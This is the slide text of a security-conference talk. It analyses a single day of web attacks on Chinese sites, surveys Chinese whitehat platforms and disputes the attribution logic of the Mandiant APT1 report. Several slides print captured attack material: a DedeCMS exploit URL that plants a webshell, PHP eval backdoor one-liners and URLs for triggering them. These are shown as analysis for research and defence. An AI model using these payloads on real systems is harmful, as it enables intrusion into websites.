{Anthony LAI, Zetta KE}, Researcher [en] China is a victim, too :-) アンソニー・ライ、ゼッタ KE 中国はいつも他者を攻撃する攻撃者として認識されているが、逆に「中国が誰かから攻撃を受けているのではないか？」という視点で、どのような攻撃をうけ、どんな理由があるのか？をお見せしよう。 さらに、他の有名な機関から発表されたAPTの調査報告書の内容から、中国からの攻撃を「推測」し、それらの「論理」についてのコメントする。 また、我々はKnownsecからキャプチャされたWeb攻撃データをVXRLで解析を行っており、うまくいけば、より鮮明な絵をお見せすることができると考えている。 もちろん、アジェンダにないオフレコ情報もあるので、みなさんに楽しんでもらえると思う。 China is always taken as an attacker to attack others, let us take a look who is attacking China, what kind of attacks China is suffering from and the possible reason, moreover, we would like to take APT research report published from other famous agency how they "deduce" the attacks from China, commenting on their "logic". In addition, we have got Knownsec to provide captured and identified Web attack data to VXRL for analysis, hopefully, we could get a much more clearer picture. Of course, we got a hidden agenda as well. It would be a fun session and let us enjoy it..

1. China is a victim, too :)
(AVTokyo Special Edition)
Darkfloyd x Zetta, VXRL

2. 感謝 ! AVTokyo!
Thank you so much to
AVTokyo Panelist

3. Disclaimer
We are not working for China or Hong Kong
government
We didn't get any fund or money from Hong Kong
and China government

4. Objective
●
China is always taken as a proactive attacker,
we wanna show there is another flip side of
analysis through:
−
Part 1: A single day of Web attack analysis against
various web sites in China.
−
Part 2: How do you know vulnerabilities published in
China software and web site?
●
−
Media always talks about blackhats in China. How about
whitehats in China?
Part 3: APT1 report counter-comment (From Ran2)

5. Part 1: A single day of Web attack analysis
against various web sites in China.

6. Research and Analysis
●
●
●
We have got a sharing of attack log/data
captured by their cloud-based application
firewall from Knownsec, Beijing with VXRL so
as to carry out the analysis.
We have picked 11 Nov, which is a day for
online shopping/e-commerce (Single's Day,
光棍節 ) with discount within Mainland China
for this talk.
We will not disclose any victims' IP address and
domain name depending on the criticality or
the nature/impact of attack.

7. Single's Day ?

8. Single's Day

9. Single’s Day as Cyber Monday
http://en.wikipedia.org/wiki/Singles_Day

10. Research and Analysis
●
What do we wanna observe and analyze?
−
Percentage distribution: Attack from overseas Vs
Attack within country
−
What kind of attacks suffered for those top victims?
−
Any top attackers?! What are their favorite payloads
skills?
−
What system(s)/platform(s) do the attackers target?
−
Any interesting attack payload?

11. 11 Nov: Attack Traffic Vs Period

12. 11 Nov: Attack Traffic Vs Period:
Evening and Night Time

13. Attack Type Distribution
Attack
Type
SCANN
ER
No. of
Request
Perc
entag
e
5910124 91.34
8 47%
LRFI
218753
0.338
1%
FILEI
222774
0.344
3%
SPECI
AL
35838
0.055
4%
WEBS
HELL
42463
0.065
6%
4491625
6.942
1%
SQLI
274792
0.424
7%
XSS
225796
0.349
0%
COLLE
CTOR

14. Where are those attackers
on e-Shopping Day (11 Nov 2013)?
According to our analysis, 97.5% is from “Within
China IP Address”, the remaining 2.5% of attack
is from overseas, but it includes scanner type.

15. How about excluding scanner type?
Country Attack
China
1070489
US
18588
Netherlands
5404
Hong Kong
4288
Korea
1823
Turkey
1429
Japan
872

16. Top 25 Attackers
Top 25 Attack
IP
Addresses are
From China,
EXCEPT 24th,
it is from US.

17. Case Studies: Victim or not?!

18. Voting for a “Good Guy”
Tou.php – “Tou” means “Voting”, in Chinese is
“ 投”
The requests against this site is with 6.5GB data.
In fact, we, Chinese are very positive to support and
promote “Good act and Good guys”
Possibly, it is hard to differentiate the real voters and robotic one

19. When looking at the traffic, we have
found attack traffic from Hong Kong
Abuse X-Forwarder to fake different IP address to voting from 58.64.X.X

20. My favorite ISP :)

21. Hey, it is 11 Nov (Single's day) for
Shopping!
We have found attacks against “Group Purchase
Web site”, 47 attempts to access order info data
of web site via old classical attack OS cmd

22. How about those overseas
attackers?
Where are they?
Country
China
US
Korea
Hong Kong
Thailand
Taiwan
Japan
IP
116.252.224.162
173.208.240.190
119.70.29.137
58.64.205.27
110.34.230.226
118.233.66.105
202.89.232.79

23. Observation: Any interesting attack
payload from overseas?
From US ?! Using China Python Layer-7DDoS
script?! :) (from 00:00 to 2359)

24. Observation: China Tools, IP
address from US :)
http://www.dklkt.cn/article.asp?id=233

25. How about attack traffic from US?

26. How about attack traffic from US?
•
•
•
Scanning and exploiting particular recently
released vulnerabilities of CMS.
We will discuss it more in details later.
Targeting forum and CMS.

27. How about attack traffic from JP?

28. How about attack traffic from JP?
Nothing special, only casual download, traffic
necessarily from scanner.
Interestingly,webscan.360.cn uses JP IP address
to scan hosts in China

29. How about attack traffic from KR?
Nothing special, only casual download, not
necessarily from scanner.
315online.com.cn - An Anti-Online Fraud Portal

30. How about attack traffic from TW
and TH?
Typical scanner traffic, nothing special.

31. How about attack traffic from
Netherland?
Scan a Wordpress-similar site in China

32. Observation: Special Payloads
against victims
●
●
●
<URL>/plus/download.php?open=1&arrs1%5B
%5D=99&arrs1%5B%5D=102&arrs1%5B
%5D=103&arrs1%5B%5D=95&arrs1%5B
%5D=100&arrs1%5B%5D=98&arrs1%5B
%5D=112&arrs1%5B%5D=114&arrs1%5B
%5D=101&arrs1%5B%5D=102&arrs1%5B
%5D=105&arrs1%5B%5D=120&arrs2%5B
%5D=109&arrs2%5B%5D=121&arrs2%5B
Create Webshell backdoor under Dedecms
Against Dedecms, I am kidding, there are lots of other
victims suffered from this kind of vulns:
http://www.wooyun.org/searchbug.php?q=dedecms

33. Dedecms (China-made CMS)

35. DedeCMS

36. Reference: DedeCMS Exploit
Interesting technique to hid the webshell: put it like a cache file.
http://www.nxadmin.com/penetration/1168.html
http://blog.csdn.net/seoyundu/article/details/12855759
/plus/download.php exploit - Inject Webshell
http://www.xiaosedi.com/post/dedecms_exp_01.html
/plus/search.php exploit - Inject Webshell
http://eoo.hk/oswork/28.htm
DedeCMS backdoor killer from Anquan.org
http://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_27895

37. As you have found 90sec.php from the log, and there is an .inc file with this statement:
{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}
However, there is no such file found from the folder
Why?
Under data/cache folder, there are several htm (myad-1.htm,myad-16.htm,mytag-1208.htm) files are found with
the following code:
<!–
document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);
–>
<!–
document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?
>axxxxx’);echo ‘OK’;@fclose($fp);?>”);
–>
<!–
document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/
[copyright]/e’,$_REQUEST['guige'],’error’);?>”);
–>

38. It is strange that .htm page could be taken as a webshell, the idea is whether those htm
files are included and gernated by another PHP file
After checking over, we have figured out: plus/mytag_js.php

39. Triggering the backdoor webshell with the following
URLs by passing in various ID values WITHOUT
detected by scanner:
http://www.nxadmin.com/plus/mytag_js.php?id=1208
http://www.nxadmin.com/plus/ad_js.php?id=1
Reference:http://www.nxadmin.com/penetration/1168.html

40. Part 2: Organizations with China Whitehats

41. Whitehats in China
Wooyun: Bugs published in China
●
The idea is the same as CVE-Mitre but more
informative and organized
●
Vendor neutral
●
Public and open
●
Promote Whitehats community (
http://www.wooyun.org/whitehats/)

42. Observation #1:
CMS bugs everywhere (after Google
translate)
http://www.wooyun.org/bug.php?action=list&subtype=52

43. Observation #2:
Even some Whitehats reported the
vulns …..
●
●
Whitehat reported a high-risk vuln. to 360, but
360 said: Ignored it !
My comment: WTF!

46. Consistently ignore high and
medium level vuln. (highlighted in
Yellow color)
http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360

47. Observation #3: Positive reward
from vendor and promotion of
whitehats

48. Zoomeye (www.zoomeye.org)

49. Whitehats in China: Anquan.org (A
Safety Alliance among various software
and security product vendors)
●
With 800 vendors
●
Vendor neutral
●
●
A platform for public to report any infringement,
privacy violation, phishing attack, etc
http://www.anquan.org/help/aboutus/authen/

50. If time permits….Part 3: APT1 Report – Counter
Comment from Ran2, VXRL

51. APT1 Report: Counter Comment
●
●
●
Anyone has read Mandiant APT1 Report?
Analysis was done by Ran2, Researcher,
VXRL.
Mandiant deduced the attack against US from
China PLA Team #61389 with the following
deduction:
−
Attacker profiling via his password
−
Posts in the forum

52. APT1 Report from Mandiant
●
On 18 February 2013, Mandiant, released an
unprecedented report – “APT1: Exposing One
of China’s Cyber Espionage Units”. Mandiant
claims that they have identified evidence linking
an APT attack group, APT1 (aka Comment
Crew) to the Military Cover Designator 61398 of
the People’s Liberation Army (PLA).

53. APT1 Report from Mandiant
●
●
●
Chinese officials have vigorously denied any
link to what Mandiant’s accusations of these
APT activities.
Some commentaries said: “Clearly, Mandiant
caught Beijing’s hands in the cookie jar”.
However, some other responses from skeptics
said that the evidence produced by Mandiant
did not include any alternative conclusions
other than pointed at China or the so-called
PLA hacking lacks of convincing evidence.

54. Clarification #1: Attacker Profiling
●
“APT1 is not a ghost in a digital machine”,
Mandinat claims; they had identified a select
number of APT1 personas. In page 51 of the
APT1 Report, they provided hints on how they
perform the persona profiling, basically by data
mining of:
−
the authors of APT1’s digital weapons, (ie the
malware)
−
the registrants’ of APT1 FQDN, (aka FQDN
profiling)
−
the email accounts (in pubic social websites)
−
the registration records of leaked hackers’ account,
Rootkit.com

55. Clarification #1: Attacker Profiling
●
●
Based on the profiling results, Mandiant
believed that these three personas were based
on Shanghai, responsible to authors the
malware, preparing and launching the APT1
attacks and they are working for PLA.
UglyGorilla (UG) is the key persona identified
that leads to the above conclusion.

56. Clarification #1: Attacker Profiling
●
Further search on the Internet, I also found
Jack Wang’s postings in the China military
forum. However, I discovered he, UglyGorilla or
Jack Wang actually posted 15 messages, only
2 messages are related to cyber war, all others
topics includes, normal warfare and even biochemical warfare. He even posted to the forum
that he was a military warfare lover, but not
mentioned he himself as a soldier. I think this
piece of information should also be disclosed in
the APT1 Report.

58. Clarification #1: Attacker Profiling
●
Even though we have high chance to proof that
UglyGorilla is Jack Wang or Wang Dong who is
the author of the APT1 malware, I don’t find
hard proof that he is a China soldier or servicing
the PLA Unit 61398. The only link I can find is
his posting in the Chinese military forum, but on
the contrary he also said his was only a military
lover.

59. Clarification #1: Attacker Profiling
Similar to UglyGorilla, the APT1 Report identified
another persona, DOTA. Based on a video
captured, I guess it was gathered from a RDP
connection on the monitored hop that DOTA
was once used to register email accounts.

60. Clarification #1: Attacker Profiling
●
●
It is clearly proof that DOTA was using a
Shanghai telephone and he is fluent in English
when communicate with other parties. I believe
DOTA using the password of “2j3c1k” may
means ( 二局三处一科 )
but we cannot rule out it bears other meanings,
such as ( 二鸡三吃一刻 ) or the meaning of “the
moment of cooking 2 chickens with three
different ways”.

61. Clarification #1: Attacker Profiling
●
●
Yes, it is interesting and there are lots of ways
to interpret the simple characters in Chinese.
I am not trying to find an exit for the
accusation, but I would like to see more solid
evidence pointing the fingers to the PLA Unit
61398 as APT1.

62. Clarification #2: Infrastructure,
Remote Desktop Sessions
●
On page 4, Mandiant mentioned that “there are
1,849 of the 1,905 sessions were observed
using keyboard layout was “Chinese
(Simplified) – US Keyboard” and they assumed
that the attackers used Chinese version of
Microsoft OS. Because the attackers are using
Chinese version of Microsoft OS, Mandiant
implies that APT1 are Mainland Chinese
speakers.

63. Clarification #2: Infrastructure,
Remote Desktop Sessions
●
Based on the RDP Protocol document from
Microsoft, I found out that the RDP client send
out its keyboard layout in a 4-bytes specification
to the RDP server (the victim or hop, in our
case). If a network sniffer was installed on the
RDP server, we can collect this piece of digital
evidence. If the attackers used “Chinese
(Simplified) – US Keyboard”, on the recipient
side, we can locate a 4-bytes evidence of
0x0804 from the network packets.

65. More details from APT1 Counter
Comment Report
−
http://espionageware.blogspot.hk/

66. Summary
●
●
●
●
●
Interesting payloads and practice against China
sites are shown.
Web attack from overseas against China on 11
Nov (a day for high volume of e-commerce and
online shopping) is not the majority.
Majority of traffic is on crawler and scanner,
other than that, the majority of attack is SQLi.
There are lots of attacks against CMS systems
in China.
There are whitehat non-profit making
organizations including Wooyun.org and
Anquan.org to help the China security
community.

67. Summary
●
●
●
●
Expect technical or/and journalist reports with
more reasonable deduction, sufficient proof and
scientific analysis.
We hope to see more balanced view and
analysis reports not just labeling China is the
only cyberwar actor in this party.
We hope to see a more fair comment to talk
about the positive side of security in China.
Selling products and solutions are easy by
giving a false sense of “threatening”,however,
as a researcher, please keep your ethics high
and mindset clear. We are researcher and
scientist but opportunist.

68. 感謝 Thank you so much :)
Respect and appreciate to Zetta and Ran2 for
their work, analysis and time
Highly Appreciate the attack log shared by
Knownsec for research purpose.
darkfloyd@vxrl.org
ozetta@vxrl.org
ran2@vxrl.org